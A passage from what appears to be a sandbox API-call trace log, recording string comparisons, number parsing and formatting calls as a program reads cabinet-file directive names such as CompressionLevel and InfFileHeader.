(_Str1="CabinetNameTemplate", _Str2="CompressionLevel") returned -14 [0254.377] _strcmpi (_Str1="ChecksumWidth", _Str2="CompressionLevel") returned -7 [0254.377] _strcmpi (_Str1="ClusterSize", _Str2="CompressionLevel") returned -3 [0254.377] _strcmpi (_Str1="Compress", _Str2="CompressionLevel") returned -105 [0254.377] _strcmpi (_Str1="LongSourceFileNames", _Str2="CompressionLevel") returned 9 [0254.377] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="CompressionLevel") returned -4 [0254.377] _strcmpi (_Str1="CompressionType", _Str2="CompressionLevel") returned 8 [0254.377] atoi (_Str="1") returned 1 [0254.377] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="CompressionLevel") returned 16 [0254.377] atoi (_Str="1") returned 1 [0254.377] atoi (_Str="2") returned 2 [0254.377] atoi (_Str="1") returned 1 [0254.377] atoi (_Str="7") returned 7 [0254.377] _strcmpi (_Str1="Cabinet", _Str2="CompressionMemory") returned -14 [0254.377] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CompressionMemory") returned -14 [0254.377] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CompressionMemory") returned -14 [0254.377] _strcmpi (_Str1="ChecksumWidth", _Str2="CompressionMemory") returned -7 [0254.377] _strcmpi (_Str1="ClusterSize", _Str2="CompressionMemory") returned -3 [0254.377] _strcmpi (_Str1="Compress", _Str2="CompressionMemory") returned -105 [0254.377] _strcmpi (_Str1="LongSourceFileNames", _Str2="CompressionMemory") returned 9 [0254.377] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="CompressionMemory") returned -4 [0254.377] _strcmpi (_Str1="CompressionType", _Str2="CompressionMemory") returned 7 [0254.377] _strcmpi (_Str1="CompressionLevel", _Str2="CompressionMemory") returned -1 [0254.377] atoi (_Str="1") returned 1 [0254.378] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="CompressionMemory") returned 17 [0254.378] atoi (_Str="1") returned 1 [0254.378] atoi (_Str="18") returned 18 [0254.378] atoi (_Str="10") returned 10 [0254.378] atoi (_Str="21") returned 21 [0254.378] _strcmpi (_Str1="Cabinet", _Str2="DestinationDir") returned -1 [0254.378] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DestinationDir") returned -1 [0254.378] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DestinationDir") returned -1 [0254.378] _strcmpi (_Str1="ChecksumWidth", _Str2="DestinationDir") returned -1 [0254.378] _strcmpi (_Str1="ClusterSize", _Str2="DestinationDir") returned -1 [0254.378] _strcmpi (_Str1="Compress", _Str2="DestinationDir") returned -1 [0254.378] _strcmpi (_Str1="LongSourceFileNames", _Str2="DestinationDir") returned 8 [0254.378] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DestinationDir") returned -1 [0254.378] _strcmpi (_Str1="CompressionType", _Str2="DestinationDir") returned -1 [0254.378] _strcmpi (_Str1="CompressionLevel", _Str2="DestinationDir") returned -1 [0254.378] _strcmpi (_Str1="CompressionMemory", _Str2="DestinationDir") returned -1 [0254.378] atoi (_Str="1") returned 1 [0254.378] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="DestinationDir") returned 14 [0254.378] atoi (_Str="1") returned 1 [0254.378] _strcmpi (_Str1="Cabinet", _Str2="DiskDirectoryTemplate") returned -1 [0254.378] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DiskDirectoryTemplate") returned -1 [0254.378] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DiskDirectoryTemplate") returned -1 [0254.378] _strcmpi (_Str1="ChecksumWidth", _Str2="DiskDirectoryTemplate") returned -1 [0254.378] _strcmpi (_Str1="ClusterSize", _Str2="DiskDirectoryTemplate") returned -1 [0254.378] _strcmpi (_Str1="Compress", _Str2="DiskDirectoryTemplate") returned -1 [0254.378] _strcmpi (_Str1="LongSourceFileNames", _Str2="DiskDirectoryTemplate") returned 8 [0254.378] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DiskDirectoryTemplate") returned -1 [0254.378] _strcmpi (_Str1="CompressionType", _Str2="DiskDirectoryTemplate") returned -1 [0254.379] _strcmpi (_Str1="CompressionLevel", _Str2="DiskDirectoryTemplate") returned -1 [0254.379] _strcmpi (_Str1="CompressionMemory", _Str2="DiskDirectoryTemplate") returned -1 [0254.379] _strcmpi (_Str1="DestinationDir", _Str2="DiskDirectoryTemplate") returned -4 [0254.379] atoi (_Str="1") returned 1 [0254.379] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="DiskDirectoryTemplate") returned 21 [0254.379] atoi (_Str="1") returned 1 [0254.379] _strcmpi (_Str1="Cabinet", _Str2="DiskLabelTemplate") returned -1 [0254.379] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DiskLabelTemplate") returned -1 [0254.379] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DiskLabelTemplate") returned -1 [0254.379] _strcmpi (_Str1="ChecksumWidth", _Str2="DiskLabelTemplate") returned -1 [0254.379] _strcmpi (_Str1="ClusterSize", _Str2="DiskLabelTemplate") returned -1 [0254.379] _strcmpi (_Str1="Compress", _Str2="DiskLabelTemplate") returned -1 [0254.379] _strcmpi (_Str1="LongSourceFileNames", _Str2="DiskLabelTemplate") returned 8 [0254.379] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DiskLabelTemplate") returned -1 [0254.379] _strcmpi (_Str1="CompressionType", _Str2="DiskLabelTemplate") returned -1 [0254.379] _strcmpi (_Str1="CompressionLevel", _Str2="DiskLabelTemplate") returned -1 [0254.379] _strcmpi (_Str1="CompressionMemory", _Str2="DiskLabelTemplate") returned -1 [0254.379] _strcmpi (_Str1="DestinationDir", _Str2="DiskLabelTemplate") returned -4 [0254.379] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="DiskLabelTemplate") returned -8 [0254.379] atoi (_Str="1") returned 1 [0254.379] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="DiskLabelTemplate") returned 17 [0254.379] atoi (_Str="1") returned 1 [0254.379] _strcmpi (_Str1="Cabinet", _Str2="DoNotCopyFiles") returned -1 [0254.379] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DoNotCopyFiles") returned -1 [0254.379] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DoNotCopyFiles") returned -1 [0254.379] _strcmpi (_Str1="ChecksumWidth", _Str2="DoNotCopyFiles") returned -1 [0254.379] _strcmpi (_Str1="ClusterSize", _Str2="DoNotCopyFiles") returned -1 [0254.379] _strcmpi (_Str1="Compress", _Str2="DoNotCopyFiles") returned -1 [0254.380] _strcmpi (_Str1="LongSourceFileNames", _Str2="DoNotCopyFiles") returned 8 [0254.380] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DoNotCopyFiles") returned -1 [0254.380] _strcmpi (_Str1="CompressionType", _Str2="DoNotCopyFiles") returned -1 [0254.380] _strcmpi (_Str1="CompressionLevel", _Str2="DoNotCopyFiles") returned -1 [0254.380] _strcmpi (_Str1="CompressionMemory", _Str2="DoNotCopyFiles") returned -1 [0254.380] _strcmpi (_Str1="DestinationDir", _Str2="DoNotCopyFiles") returned -10 [0254.380] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="DoNotCopyFiles") returned -6 [0254.380] _strcmpi (_Str1="DiskLabelTemplate", _Str2="DoNotCopyFiles") returned -6 [0254.380] atoi (_Str="1") returned 1 [0254.380] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="DoNotCopyFiles") returned 14 [0254.380] atoi (_Str="1") returned 1 [0254.380] _strcmpi (_Str1="Off", _Str2="No") returned 1 [0254.380] _strcmpi (_Str1="Off", _Str2="Off") returned 0 [0254.380] _strcmpi (_Str1="Cabinet", _Str2="FolderFileCountThreshold") returned -3 [0254.380] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="FolderFileCountThreshold") returned -3 [0254.380] _strcmpi (_Str1="CabinetNameTemplate", _Str2="FolderFileCountThreshold") returned -3 [0254.380] _strcmpi (_Str1="ChecksumWidth", _Str2="FolderFileCountThreshold") returned -3 [0254.380] _strcmpi (_Str1="ClusterSize", _Str2="FolderFileCountThreshold") returned -3 [0254.380] _strcmpi (_Str1="Compress", _Str2="FolderFileCountThreshold") returned -3 [0254.380] _strcmpi (_Str1="LongSourceFileNames", _Str2="FolderFileCountThreshold") returned 6 [0254.380] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="FolderFileCountThreshold") returned -3 [0254.380] _strcmpi (_Str1="CompressionType", _Str2="FolderFileCountThreshold") returned -3 [0254.380] _strcmpi (_Str1="CompressionLevel", _Str2="FolderFileCountThreshold") returned -3 [0254.380] _strcmpi (_Str1="CompressionMemory", _Str2="FolderFileCountThreshold") returned -3 [0254.380] _strcmpi (_Str1="DestinationDir", _Str2="FolderFileCountThreshold") returned -2 [0254.380] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="FolderFileCountThreshold") returned -2 [0254.380] _strcmpi (_Str1="DiskLabelTemplate", _Str2="FolderFileCountThreshold") returned -2 [0254.380] _strcmpi (_Str1="DoNotCopyFiles", _Str2="FolderFileCountThreshold") returned -2 [0254.380] atoi (_Str="1") returned 1 [0254.380] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="FolderFileCountThreshold") returned 24 [0254.381] atoi (_Str="1") returned 1 [0254.381] _strcmpi (_Str1="Cabinet", _Str2="FolderSizeThreshold") returned -3 [0254.381] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="FolderSizeThreshold") returned -3 [0254.381] _strcmpi (_Str1="CabinetNameTemplate", _Str2="FolderSizeThreshold") returned -3 [0254.381] _strcmpi (_Str1="ChecksumWidth", _Str2="FolderSizeThreshold") returned -3 [0254.381] _strcmpi (_Str1="ClusterSize", _Str2="FolderSizeThreshold") returned -3 [0254.381] _strcmpi (_Str1="Compress", _Str2="FolderSizeThreshold") returned -3 [0254.381] _strcmpi (_Str1="LongSourceFileNames", _Str2="FolderSizeThreshold") returned 6 [0254.381] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="FolderSizeThreshold") returned -3 [0254.381] _strcmpi (_Str1="CompressionType", _Str2="FolderSizeThreshold") returned -3 [0254.381] _strcmpi (_Str1="CompressionLevel", _Str2="FolderSizeThreshold") returned -3 [0254.381] _strcmpi (_Str1="CompressionMemory", _Str2="FolderSizeThreshold") returned -3 [0254.382] _strcmpi (_Str1="DestinationDir", _Str2="FolderSizeThreshold") returned -2 [0254.382] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="FolderSizeThreshold") returned -2 [0254.382] _strcmpi (_Str1="DiskLabelTemplate", _Str2="FolderSizeThreshold") returned -2 [0254.382] _strcmpi (_Str1="DoNotCopyFiles", _Str2="FolderSizeThreshold") returned -2 [0254.382] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="FolderSizeThreshold") returned -13 [0254.382] atoi (_Str="1") returned 1 [0254.382] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="FolderSizeThreshold") returned 19 [0254.382] atoi (_Str="1") returned 1 [0254.382] _strcmpi (_Str1="Cabinet", _Str2="GenerateInf") returned -4 [0254.382] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="GenerateInf") returned -4 [0254.382] _strcmpi (_Str1="CabinetNameTemplate", _Str2="GenerateInf") returned -4 [0254.382] _strcmpi (_Str1="ChecksumWidth", _Str2="GenerateInf") returned -4 [0254.382] _strcmpi (_Str1="ClusterSize", _Str2="GenerateInf") returned -4 [0254.382] _strcmpi (_Str1="Compress", _Str2="GenerateInf") returned -4 [0254.382] _strcmpi (_Str1="LongSourceFileNames", _Str2="GenerateInf") returned 5 [0254.382] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="GenerateInf") returned -4 [0254.382] _strcmpi (_Str1="CompressionType", _Str2="GenerateInf") returned -4 [0254.382] _strcmpi (_Str1="CompressionLevel", _Str2="GenerateInf") returned -4 [0254.382] _strcmpi (_Str1="CompressionMemory", _Str2="GenerateInf") returned -4 [0254.382] _strcmpi (_Str1="DestinationDir", _Str2="GenerateInf") returned -3 [0254.382] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="GenerateInf") returned -3 [0254.382] _strcmpi (_Str1="DiskLabelTemplate", _Str2="GenerateInf") returned -3 [0254.382] _strcmpi (_Str1="DoNotCopyFiles", _Str2="GenerateInf") returned -3 [0254.382] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="GenerateInf") returned -1 [0254.382] _strcmpi (_Str1="FolderSizeThreshold", _Str2="GenerateInf") returned -1 [0254.382] atoi (_Str="1") returned 1 [0254.382] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="GenerateInf") returned 11 [0254.383] atoi (_Str="1") returned 1 [0254.383] _strcmpi (_Str1="On", _Str2="No") returned 1 [0254.383] _strcmpi (_Str1="On", _Str2="Off") returned 8 [0254.383] _strcmpi (_Str1="On", _Str2="False") returned 9 [0254.383] _strcmpi (_Str1="On", _Str2="Yes") returned -10 [0254.383] _strcmpi (_Str1="On", _Str2="On") returned 0 [0254.383] _strcmpi (_Str1="Cabinet", _Str2="InfCabinetHeader") returned -6 [0254.383] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfCabinetHeader") returned -6 [0254.383] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfCabinetHeader") returned -6 [0254.383] _strcmpi (_Str1="ChecksumWidth", _Str2="InfCabinetHeader") returned -6 [0254.383] _strcmpi (_Str1="ClusterSize", _Str2="InfCabinetHeader") returned -6 [0254.383] _strcmpi (_Str1="Compress", _Str2="InfCabinetHeader") returned -6 [0254.383] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfCabinetHeader") returned 3 [0254.383] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfCabinetHeader") returned -6 [0254.383] _strcmpi (_Str1="CompressionType", _Str2="InfCabinetHeader") returned -6 [0254.383] _strcmpi (_Str1="CompressionLevel", _Str2="InfCabinetHeader") returned -6 [0254.383] _strcmpi (_Str1="CompressionMemory", _Str2="InfCabinetHeader") returned -6 [0254.383] _strcmpi (_Str1="DestinationDir", _Str2="InfCabinetHeader") returned -5 [0254.383] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfCabinetHeader") returned -5 [0254.383] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfCabinetHeader") returned -5 [0254.383] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfCabinetHeader") returned -5 [0254.383] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfCabinetHeader") returned -3 [0254.383] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfCabinetHeader") returned -3 [0254.383] _strcmpi (_Str1="GenerateInf", _Str2="InfCabinetHeader") returned -2 [0254.383] atoi (_Str="1") returned 1 [0254.383] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfCabinetHeader") returned 16 [0254.383] atoi (_Str="1") returned 1 [0254.384] _strcmpi (_Str1="Cabinet", _Str2="InfCabinetLineFormat") returned -6 [0254.384] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfCabinetLineFormat") returned -6 [0254.384] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfCabinetLineFormat") returned -6 [0254.384] _strcmpi (_Str1="ChecksumWidth", _Str2="InfCabinetLineFormat") returned -6 [0254.384] _strcmpi (_Str1="ClusterSize", _Str2="InfCabinetLineFormat") returned -6 [0254.384] _strcmpi (_Str1="Compress", _Str2="InfCabinetLineFormat") returned -6 [0254.384] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfCabinetLineFormat") returned 3 [0254.384] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfCabinetLineFormat") returned -6 [0254.384] _strcmpi (_Str1="CompressionType", _Str2="InfCabinetLineFormat") returned -6 [0254.384] _strcmpi (_Str1="CompressionLevel", _Str2="InfCabinetLineFormat") returned -6 [0254.384] _strcmpi (_Str1="CompressionMemory", _Str2="InfCabinetLineFormat") returned -6 [0254.384] _strcmpi (_Str1="DestinationDir", _Str2="InfCabinetLineFormat") returned -5 [0254.384] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfCabinetLineFormat") returned -5 [0254.384] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfCabinetLineFormat") returned -5 [0254.384] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfCabinetLineFormat") returned -5 [0254.384] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfCabinetLineFormat") returned -3 [0254.384] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfCabinetLineFormat") returned -3 [0254.384] _strcmpi (_Str1="GenerateInf", _Str2="InfCabinetLineFormat") returned -2 [0254.384] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfCabinetLineFormat") returned -4 [0254.384] atoi (_Str="1") returned 1 [0254.384] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfCabinetLineFormat") returned 20 [0254.384] atoi (_Str="1") returned 1 [0254.384] _strcmpi (_Str1="Cabinet", _Str2="InfCommentString") returned -6 [0254.384] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfCommentString") returned -6 [0254.384] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfCommentString") returned -6 [0254.384] _strcmpi (_Str1="ChecksumWidth", _Str2="InfCommentString") returned -6 [0254.384] _strcmpi (_Str1="ClusterSize", _Str2="InfCommentString") returned -6 [0254.384] _strcmpi (_Str1="Compress", _Str2="InfCommentString") returned -6 [0254.384] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfCommentString") returned 3 [0254.384] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfCommentString") returned -6 [0254.384] _strcmpi (_Str1="CompressionType", _Str2="InfCommentString") returned -6 [0254.384] _strcmpi (_Str1="CompressionLevel", _Str2="InfCommentString") returned -6 [0254.384] _strcmpi (_Str1="CompressionMemory", _Str2="InfCommentString") returned -6 [0254.384] _strcmpi (_Str1="DestinationDir", _Str2="InfCommentString") returned -5 [0254.384] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfCommentString") returned -5 [0254.384] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfCommentString") returned -5 [0254.385] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfCommentString") returned -5 [0254.385] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfCommentString") returned -3 [0254.385] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfCommentString") returned -3 [0254.385] _strcmpi (_Str1="GenerateInf", _Str2="InfCommentString") returned -2 [0254.385] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfCommentString") returned -14 [0254.385] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfCommentString") returned -14 [0254.385] atoi (_Str="1") returned 1 [0254.385] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfCommentString") returned 16 [0254.385] atoi (_Str="1") returned 1 [0254.385] _strcmpi (_Str1="Cabinet", _Str2="InfDateFormat") returned -6 [0254.385] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfDateFormat") returned -6 [0254.385] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfDateFormat") returned -6 [0254.385] _strcmpi (_Str1="ChecksumWidth", _Str2="InfDateFormat") returned -6 [0254.385] _strcmpi (_Str1="ClusterSize", _Str2="InfDateFormat") returned -6 [0254.385] _strcmpi (_Str1="Compress", _Str2="InfDateFormat") returned -6 [0254.385] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfDateFormat") returned 3 [0254.385] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfDateFormat") returned -6 [0254.385] _strcmpi (_Str1="CompressionType", _Str2="InfDateFormat") returned -6 [0254.385] _strcmpi (_Str1="CompressionLevel", _Str2="InfDateFormat") returned -6 [0254.385] _strcmpi (_Str1="CompressionMemory", _Str2="InfDateFormat") returned -6 [0254.385] _strcmpi (_Str1="DestinationDir", _Str2="InfDateFormat") returned -5 [0254.385] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfDateFormat") returned -5 [0254.385] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfDateFormat") returned -5 [0254.385] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfDateFormat") returned -5 [0254.385] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfDateFormat") returned -3 [0254.385] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfDateFormat") returned -3 [0254.385] _strcmpi (_Str1="GenerateInf", _Str2="InfDateFormat") returned -2 [0254.385] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfDateFormat") returned -1 [0254.385] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfDateFormat") returned -1 [0254.385] _strcmpi (_Str1="InfCommentString", _Str2="InfDateFormat") returned -1 [0254.385] atoi (_Str="1") returned 1 [0254.385] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfDateFormat") returned 13 [0254.385] atoi (_Str="1") returned 1 [0254.386] _strcmpi (_Str1="mm/dd/yy", _Str2="mm/dd/yy") returned 0 [0254.386] _strcmpi (_Str1="Cabinet", _Str2="InfDiskHeader") returned -6 [0254.386] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfDiskHeader") returned -6 [0254.386] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfDiskHeader") returned -6 [0254.386] _strcmpi (_Str1="ChecksumWidth", _Str2="InfDiskHeader") returned -6 [0254.386] _strcmpi (_Str1="ClusterSize", _Str2="InfDiskHeader") returned -6 [0254.386] _strcmpi (_Str1="Compress", _Str2="InfDiskHeader") returned -6 [0254.386] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfDiskHeader") returned 3 [0254.386] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfDiskHeader") returned -6 [0254.386] _strcmpi (_Str1="CompressionType", _Str2="InfDiskHeader") returned -6 [0254.386] _strcmpi (_Str1="CompressionLevel", _Str2="InfDiskHeader") returned -6 [0254.386] _strcmpi (_Str1="CompressionMemory", _Str2="InfDiskHeader") returned -6 [0254.386] _strcmpi (_Str1="DestinationDir", _Str2="InfDiskHeader") returned -5 [0254.386] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfDiskHeader") returned -5 [0254.386] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfDiskHeader") returned -5 [0254.386] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfDiskHeader") returned -5 [0254.386] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfDiskHeader") returned -3 [0254.386] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfDiskHeader") returned -3 [0254.386] _strcmpi (_Str1="GenerateInf", _Str2="InfDiskHeader") returned -2 [0254.386] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfDiskHeader") returned -1 [0254.386] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfDiskHeader") returned -1 [0254.386] _strcmpi (_Str1="InfCommentString", _Str2="InfDiskHeader") returned -1 [0254.386] _strcmpi (_Str1="InfDateFormat", _Str2="InfDiskHeader") returned -8 [0254.386] atoi (_Str="1") returned 1 [0254.386] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfDiskHeader") returned 13 [0254.386] atoi (_Str="1") returned 1 [0254.386] _strcmpi (_Str1="Cabinet", _Str2="InfDiskLineFormat") returned -6 [0254.386] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfDiskLineFormat") returned -6 [0254.386] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfDiskLineFormat") returned -6 [0254.386] _strcmpi (_Str1="ChecksumWidth", _Str2="InfDiskLineFormat") returned -6 [0254.386] _strcmpi (_Str1="ClusterSize", _Str2="InfDiskLineFormat") returned -6 [0254.386] _strcmpi (_Str1="Compress", _Str2="InfDiskLineFormat") returned -6 [0254.386] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfDiskLineFormat") returned 3 [0254.386] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfDiskLineFormat") returned -6 [0254.386] _strcmpi (_Str1="CompressionType", _Str2="InfDiskLineFormat") returned -6 [0254.387] _strcmpi (_Str1="CompressionLevel", _Str2="InfDiskLineFormat") returned -6 [0254.387] _strcmpi (_Str1="CompressionMemory", _Str2="InfDiskLineFormat") returned -6 [0254.387] _strcmpi (_Str1="DestinationDir", _Str2="InfDiskLineFormat") returned -5 [0254.387] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfDiskLineFormat") returned -5 [0254.387] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfDiskLineFormat") returned -5 [0254.387] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfDiskLineFormat") returned -5 [0254.387] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfDiskLineFormat") returned -3 [0254.387] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfDiskLineFormat") returned -3 [0254.387] _strcmpi (_Str1="GenerateInf", _Str2="InfDiskLineFormat") returned -2 [0254.387] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfDiskLineFormat") returned -1 [0254.387] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfDiskLineFormat") returned -1 [0254.387] _strcmpi (_Str1="InfCommentString", _Str2="InfDiskLineFormat") returned -1 [0254.387] _strcmpi (_Str1="InfDateFormat", _Str2="InfDiskLineFormat") returned -8 [0254.387] _strcmpi (_Str1="InfDiskHeader", _Str2="InfDiskLineFormat") returned -4 [0254.387] atoi (_Str="1") returned 1 [0254.387] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfDiskLineFormat") returned 17 [0254.387] atoi (_Str="1") returned 1 [0254.387] _strcmpi (_Str1="Cabinet", _Str2="InfFileHeader") returned -6 [0254.387] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFileHeader") returned -6 [0254.387] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFileHeader") returned -6 [0254.387] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFileHeader") returned -6 [0254.387] _strcmpi (_Str1="ClusterSize", _Str2="InfFileHeader") returned -6 [0254.387] _strcmpi (_Str1="Compress", _Str2="InfFileHeader") returned -6 [0254.387] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFileHeader") returned 3 [0254.387] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFileHeader") returned -6 [0254.387] _strcmpi (_Str1="CompressionType", _Str2="InfFileHeader") returned -6 [0254.387] _strcmpi (_Str1="CompressionLevel", _Str2="InfFileHeader") returned -6 [0254.387] _strcmpi (_Str1="CompressionMemory", _Str2="InfFileHeader") returned -6 [0254.387] _strcmpi (_Str1="DestinationDir", _Str2="InfFileHeader") returned -5 [0254.387] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFileHeader") returned -5 [0254.387] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFileHeader") returned -5 [0254.387] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFileHeader") returned -5 [0254.387] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFileHeader") returned -3 [0254.387] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFileHeader") returned -3 [0254.388] _strcmpi (_Str1="GenerateInf", _Str2="InfFileHeader") returned -2 [0254.388] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFileHeader") returned -3 [0254.388] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFileHeader") returned -3 [0254.388] _strcmpi (_Str1="InfCommentString", _Str2="InfFileHeader") returned -3 [0254.388] _strcmpi (_Str1="InfDateFormat", _Str2="InfFileHeader") returned -2 [0254.388] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFileHeader") returned -2 [0254.388] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFileHeader") returned -2 [0254.388] atoi (_Str="1") returned 1 [0254.388] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfFileHeader") returned 13 [0254.388] atoi (_Str="1") returned 1 [0254.388] _strcmpi (_Str1="Cabinet", _Str2="InfFileLineFormat") returned -6 [0254.388] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFileLineFormat") returned -6 [0254.388] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFileLineFormat") returned -6 [0254.388] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFileLineFormat") returned -6 [0254.388] _strcmpi (_Str1="ClusterSize", _Str2="InfFileLineFormat") returned -6 